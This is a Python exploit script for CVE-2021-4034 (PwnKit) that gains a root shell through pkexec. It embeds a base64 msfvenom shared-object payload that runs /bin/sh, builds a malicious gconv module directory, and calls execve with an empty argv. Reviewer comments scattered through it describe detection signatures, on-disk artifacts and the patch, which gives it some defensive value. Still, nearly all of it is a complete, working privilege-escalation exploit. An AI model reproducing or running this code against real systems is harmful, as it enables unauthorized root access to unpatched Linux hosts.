#!/usr/bin/env python3
# CVE-2021-4034
# Original research done by Qualys https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
# Credits to (blasty and Joe Ammond) for their great work
# exploit code written by Ahmad Almorabea @almorabea
#
# Reviewer notes — a defensive reading of what this script actually does,
# for detection, forensics and mitigation purposes:
#   * Artifacts written to the *current working directory* (never removed
#     after the final execve(); only a previous run's copies are deleted
#     up front):
#       payload.so            decoded from the base64 blob (or a user file)
#       GCONV_PATH=./exploit  empty file inside a directory literally named
#                             "GCONV_PATH=."
#       exploit/gconv-modules one-line gconv module table pointing at ../payload
#   * It execs /usr/bin/pkexec with a NULL argv (argc == 0) and a hand-built
#     environment (see `environ`) rather than the caller's environment; the
#     argc == 0 condition is the trigger described in the Qualys advisory.
#   * Mitigation is the vendor polkit update for CVE-2021-4034; the advisory
#     also describes removing the setuid bit from pkexec as a stop-gap.
#     A patched pkexec should refuse an empty argv and this script then has
#     no effect beyond the files it leaves behind.

import base64
import os
import sys
import shutil
from ctypes import *
from ctypes.util import find_library

choise = input ("Do you want to choose a custom payload? y/n (n use default payload) ")
if choise == 'y':
    # NOTE(review): the prompt wording suggests pasting base64 text, but the
    # value entered is used as a *file path*; the file is read as text and
    # echoed to stdout. The handle is never closed (no `with`), so it stays
    # open until interpreter exit.
    cPayload = input("please choose the payload in base64 from msfvenom ")
    temp = open(cPayload, "r")
    payload_byte_msfvenom = temp.read()
    print(payload_byte_msfvenom)
else:
    #msfvenom linux/x64/exec payload
    # Base64 of an ELF shared object. For matching on disk, use the decoded
    # bytes written to payload.so, not this text: b64decode() discards the
    # embedded newlines, so whitespace layout here is not significant.
    payload_byte_msfvenom = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''

# Decoded shared-object bytes; this is what gets written to payload.so below.
payload64 = base64.b64decode(payload_byte_msfvenom)

# altered environment variable to pass it to execve()
# Hand-built envp for execve(); the trailing None becomes the NULL terminator
# of the C array built further down. Note the first entry is not a KEY=VALUE
# pair, and PATH is set to a directory whose *name* is "GCONV_PATH=.".
# Detection: a pkexec process whose environment contains "PATH=GCONV_PATH=."
# or "XAUTHORITY=../exploitedWithLove" is a direct signature of this script.
environ = [
    b'exploit',
    b'PATH=GCONV_PATH=.',
    b'LC_MESSAGES=en_US.UTF-8',
    b'XAUTHORITY=../exploitedWithLove',
    None
]

# Removes this script's own leftovers from a prior run. It calls rmtree() on
# two directory names it does not own exclusively, so a pre-existing,
# unrelated "exploit" directory in cwd would be deleted as well.
print("[+] Cleaning pervious exploiting attempt (if exist)")
if os.path.exists("payload.so"):
    os.remove("payload.so")
if os.path.exists("exploit"):
    shutil.rmtree("exploit")
if os.path.exists("GCONV_PATH=."):
    shutil.rmtree("GCONV_PATH=.")

print('[+] Creating shared library for exploit code.')
# Bare `except:` here (and below) also swallows KeyboardInterrupt/SystemExit,
# so the only visible failure signal is the printed message.
try:
    with open('payload.so', 'wb') as f:
        f.write(payload64)
except:
    print('[!] Failed creating payload.so.')
    sys.exit()
os.chmod('payload.so', 755)

# Creates the oddly named directory "GCONV_PATH=." plus an empty file
# "exploit" inside it; both are on-disk indicators of this tool.
try:
    os.mkdir("GCONV_PATH=.")
    with open('GCONV_PATH=./exploit', 'wb') as f:
        f.write(b'')
except:
    print('[!] Failed creating exploit file')
    sys.exit()
os.chmod('GCONV_PATH=./exploit', 755)

try:
    os.mkdir('exploit')
except FileExistsError:
    print('[-] exploit directory already exists, continuing.')
except:
    print('[!] Failed making exploit directory.')
    sys.exit()

# One-line gconv module table. The relative "../payload" is presumably
# resolved from the "exploit" directory to the payload.so written above —
# the exact glibc lookup rule is not visible here. The error message says
# "gconf-modules" but the file written is "gconv-modules".
try:
    with open('exploit/gconv-modules', 'wb') as f:
        f.write(b'module UTF-8// INTERNAL ../payload 2\n');
except:
    print('[!] Failed to create gconf-modules config file.')
    sys.exit()

# NULL-terminated char*[] for envp; the None element in `environ` maps to
# a NULL pointer.
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ

# libc is loaded through ctypes so execve() can be called with an explicit
# NULL argv — presumably because os.execve() rejects an empty argv list.
try:
    print("[+] Finding a libc library to call execve")
    libc = CDLL(find_library('c'))
    print("[+] Found a library at " + str(libc))
except:
    print('[!] Failed to find the library ')
    sys.exit()

# Both messages print *before* the call and regardless of its outcome; they
# say nothing about whether pkexec actually did anything.
print('[+] Call execve() with chosen payload')
print('[+] Enjoy your root shell')
# argv is NULL (c_char_p(None)) and envp is the array above. If execve()
# succeeds the Python process is replaced by pkexec and nothing after this
# line runs; its return value is not checked, so a failed exec simply falls
# off the end of the script.
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)